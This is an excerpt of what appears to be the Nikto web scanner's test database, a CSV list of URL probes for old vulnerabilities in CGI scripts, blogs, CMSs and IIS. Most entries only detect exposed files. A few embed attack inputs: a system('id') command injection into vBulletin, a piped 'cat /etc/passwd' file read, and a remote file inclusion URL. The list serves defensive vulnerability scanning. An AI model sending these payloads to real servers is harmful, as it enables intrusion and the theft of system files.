db_tests

Ubuntu packages of security software。 相当不错的源码

"000070","0","8","/forumdisplay.php?GLOBALS[]=1&f=2&comma=\".system('id').\"","GET","uid=0","","","","","VBulletin forumdisplay.php remote command execution. BID-12542","",""
"000071","0","8","/guestbook/guestbook.html","GET","Jason Maloney","","","","","Jason Maloney CGI Guestbook 3.0 allows remote code execution. Bugtraq 2003-12-01","",""
"000072","0","8","/html/cgi-bin/cgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","This CGI allows attackers to execute remote commands.","",""
"000073","0","9","/geeklog/users.php","GET","200","","","","","Geeklog prior to 1.3.8-1sr2 contain a SQL injection vulnerability that lets a remote attacker reset admin password.","",""
"000074","0","a","/gb/index.php?login=true","GET","200","","","","","gBook may allow admin login by setting the value 'login' equal to 'true'.","",""
"000075","0","a","/guestbook/admin.php","GET","200","","","","","Guestbook admin page available without authentication.","",""
"000076","0","b","@CGIDIRSgH.cgi","GET","200","","","","","web backdoor by gH","",""
"000077","0","b","@CGIDIRSgm-cplog.cgi","GET","200","","","","","GreyMatter log file defaults to mode 666 and contains login and passwords used to update the GM site. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.","",""
"000078","0","b","/getaccess","GET","200","","","","","This may be an indication that the server is running getAccess for SSO","",""
"000079","0","b","/help.html","GET","nice little interface into SPIKE","","","","","SPIKE Proxy may be running. Try using this port as a proxy, and see http://www.immunitysec.com/",".",""
"000080","0","3b","@CGIDIRSgm.cgi","GET","200","","","","","GreyMatter blogger may reveal user ids/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.","",""
"000081","0","c","/filemanager/filemanager_forms.php","GET","200","","","","","Some versions of PHProjekt allow remote file inclusions. Verify the current version is running. See http://www.securiteam.com/unixfocus/5PP0F1P6KS.html for more info","",""
"000082","0","1","@CGIDIRSAT-admin.cgi","GET","200","","","","","Admin interface...","",""
"000083","0","23","@CGIDIRSauth_data/auth_user_file.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","",""
"000084","0","23","@CGIDIRSawstats.pl","GET","Traffic","","","","","Free realtime logfile analyzer for advanced web statistics. Should be protected.","",""
"000085","0","23","@CGIDIRSawstats/awstats.pl","GET","Traffic","","","","","Free realtime logfile analyzer for advanced web statistics. Should be protected.","",""
"000086","0","23b","@CGIDIRSblog/mt.cfg","GET","configuration file","","","","","Movable Type configuration file found. Should not be available remotely.","",""
"000087","0","3","@CGIDIRScart.pl?db='","GET","c:\",","","","","","Dansie Shopping Cart reveals the full path to the CGI directory.","",""
"000088","0","3","@CGIDIRScart.pl?db='","GET","d:\",","","","","","Dansie Shopping Cart reveals the full path to the CGI directory.","",""
"000089","292","3","@CGIDIRShtsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=","GET","ht:\/\/Dig","","","","","The ht://Dig install may reveal the path to its configuration files, revealing sensitive information about the server.","",""
"000090","0","3","@CGIDIRSmt-static/mt-check.cgi","GET","200","","","","","Movable Type weblog diagnostic script found. Reveals docroot path, operating system, perl version, and modules.","",""
"000091","0","3","@CGIDIRSmt/mt-check.cgi","GET","200","","","","","Movable Type weblog diagnostic script found. Reveals docroot path, operating system, perl version, and modules.","",""
"000092","0","3","/cfdocs/expeval/openfile.cfm","GET","200","","","","","Can use to expose the system/server path.","",""
"000093","0","3","/index.php/123","GET","Premature end of script headers","","","","","Some versions of PHP reveal PHP's physical path on the server by appending /123 to the php file name.","",""
"000094","7510","3","/mambo/index.php?Itemid=JUNK(5)","GET","exceeded in /","","","","","Mambo Site Server 4.0.11 reveals the web server path.","",""
"000095","23654","3","/profile.php?u=JUNK(8)","GET","Warning:","","","","","Powerboards is vulnerable to path disclosure.","",""
"000096","0","3","/ticket.php?id=99999","GET","expects first argument","","","","","ZenTrack from http://zentrack.phpzen.net/ versions v2.0.3, v2.0.2beta and older reveal the web root with certain errors.","",""
"000097","0","3","/vgn/login/1,501,,00.html?cookieName=x--\>","GET","value=\"x--","","","","","Vignette server may leak memory with an invalid request. Upgrade to the latest version.","",""
"000098","0","3","/a%5c.aspx","GET","Invalid file name for monitoring:","","","","","Older Microsoft .NET installations allow full path disclosure.","",""
"000099","0","7","@CGIDIRSbanner.cgi","GET","200","","","","","This CGI may allow attackers to read any file on the system.","",""
"000100","0","7","@CGIDIRSbannereditor.cgi","GET","200","","","","","This CGI may allow attackers to read any file on the system.","",""
"000101","599","7","@CGIDIRSbook.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","",""
"000102","0","7","/admin/browse.asp?FilePath=c:\&Opt=2&level=0","GET","winnt","","","","","Hosting Controller from hostingcontroller.com allows any file on the system to be read remotely.","",""
"000103","0","8","@CGIDIRSarchitext_query.pl","GET","200","","","","","Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.","",""
"000104","0","8","@CGIDIRSbizdb1-search.cgi","GET","200","","","","","This CGI may allow attackers to execute commands remotely. See http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm","",""
"000105","0","b","@CGIDIRSblog/","GET","200","","","","","A blog was found. May contain security problems in CGIs, weak passwords, and more.","",""
"000106","0","b","/tsweb/","GET","200","","","","","Microsoft TSAC found. http://www.dslwebserver.com/main/fr_index.html?/main/sbs-Terminal-Services-Advanced-Client-Configuration.html","",""
"000107","0","1b","@CGIDIRSblog/mt-load.cgi","GET","200","","","","","Movable Type weblog installation CGI found. May be able to reconfigure or reload.","",""
"000108","0","c","@CGIDIRSatk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/","GET","http://xxxxxxxxxx/atk/","","","","","Achievo can be made to include php files from another domain. Upgrade to a new version.","",""
"000109","0","23","/vgn/performance/TMT","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000110","0","23","/vgn/performance/TMT/Report","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000111","0","23","/vgn/performance/TMT/Report/XML","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000112","0","23","/vgn/performance/TMT/reset","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000113","0","23","/vgn/ppstats","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000114","0","23","/vgn/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000115","0","23","/vgn/record/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000116","0","23","/vgn/stylepreviewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000117","0","23","/vgn/vr/Deleting","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000118","0","23","/vgn/vr/Editing","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000119","0","23","/vgn/vr/Saving","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000120","0","23","/vgn/vr/Select","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000121","0","23","/scripts/iisadmin/bdir.htr","GET","200","","","","","This default script shows host info, may allow file browsing and buffer a overrun in the Chunked Encoding data transfer mechanism, request /scripts/iisadmin/bdir.htr??c:\<dirs> . MS02-028. CA-2002-09.","",""
"000122","0","2a","/scripts/iisadmin/ism.dll","GET","200","","","","","allows you to mount a brute force attack on passwords","",""
"000123","0","2a","/scripts/tools/ctss.idc","GET","200","","","","","This CGI allows remote users to view and modify SQL DB contents, server paths, docroot and more.","",""
"000124","0","3","/bigconf.cgi","GET","200","","","","","BigIP Configuration CGI","",""
"000125","0","3","/billing/billing.apw","GET","PASS BOX CAPTION:","","","","","CoffeeCup password wizzard allows password files to be read remotely.","",""
"000126","0","3","/blah_badfile.shtml","GET","200","","","","","Allaire Coldfusion allows jsp source viewed through a vulnerable SSI call.","<!--#include virtual=\"/index.jsp\"-->",""
"000127","0","3","/blah-whatever-badfile.jsp","GET","Script /","","","","","The web server is configured to respond with the web server path when requesting a non-existent .jsp file.","",""
"000128","0","3","/vgn/style","GET","200","","","","","Vignette server may reveal system information through this file.","",""
"000129","0","3","/scripts/no-such-file.pl","GET","perl script","","","","","Using perl.exe allows attacker to view host info. Use perlis.dll instead.","",""
"000130","17653","3","/SiteServer/Admin/commerce/foundation/domain.asp","GET","200","","","","","Displays known domains of which that server is involved.","",""
"000131","17654","3","/SiteServer/Admin/commerce/foundation/driver.asp","GET","200","","","","","Displays a list of installed ODBC drivers.","",""
"000132","17655","3","/SiteServer/Admin/commerce/foundation/DSN.asp","GET","200","","","","","Displays all DSNs configured for selected ODBC drivers."," ",""
"000133","17652","3","/SiteServer/admin/findvserver.asp","GET","200","","","","","Gives a list of installed Site Server components.","",""
"000134","0","3","/SiteServer/Admin/knowledge/dsmgr/default.asp","GET","200","","","","","Used to view current search catalog configurations","",""
"000135","0","4","@CGIDIRScgiwrap/%3Cfont%20color=red%3E","GET","<font color=red>","","","","","cgiwrap allows HTML and possibly XSS injection. See http://archives.neohapsis.com/archives/bugtraq/2001-07/0499.html for details.","",""
"000136","0","4","@CGIDIRSmoin.cgi?test","GET","200","","","","","MoinMoin 1.1 and prior contain at least two XSS vulnerabilities. Version 1.0 and prior also contains a XSLT related vuln.","",""
"000137","0","4","/autologon.html?10514","GET","200","","","","","Remotely Anywhere 5.10.415 is vulnerable to XSS attacks that can lead to cookie theft or privilege escalation. This is typically found on port 2000.","",""
"000138","0","4","/basilix/mbox-list.php3","GET","200","","","","","BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'message list' function/page","",""
"000139","0","4","/basilix/message-read.php3","GET","200","","","","","BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'read message' function/page","",""
"000140","0","4","/clusterframe.jsp","GET","200","","","","","Macromedia Jrun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.","",""
"000141","0","4","/IlohaMail/blank.html","GET","200","","","","","IlohaMail 0.8.10 contains a XSS vulnerability. Previous versions contain other non-descript vulnerabilities.","",""
"000142","0","8","/bb-dnbd/faxsurvey","GET","200","","","","","This may allow arbitrary command execution.","",""
"000143","0","8","/cartcart.cgi","GET","200","","","","","If this is Dansie shopping cart 3.0.8 or earlier, it contains a backdoor to allow attackers to execute arbitrary commands.","",""
"000144","0","8","/scripts/Carello/Carello.dll","GET","200","","","","","Carello 1.3 may allow commands to be executed on the server by replacing hidden form elements. This could not be tested by Nikto.","",""
"000145","0","a","/scripts/tools/dsnform.exe","GET","200","","","","","Allows creation of ODBC Data Source","",""
"000146","0","a","/scripts/tools/dsnform","GET","200","","","","","Allows creation of ODBC Data Source","",""
"000147","17656","a","/SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp","GET","200","","","","","Used to create, modify, and potentially delete LDAP users and groups.","",""
"000148","17657","a","/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp","GET","200","","","","","Used to create, modify, and potentially delete LDAP users and groups.","",""
"000149","0","b","/prd.i/pgen/","GET","200","","","","","has MS Merchant Server 1.0","",""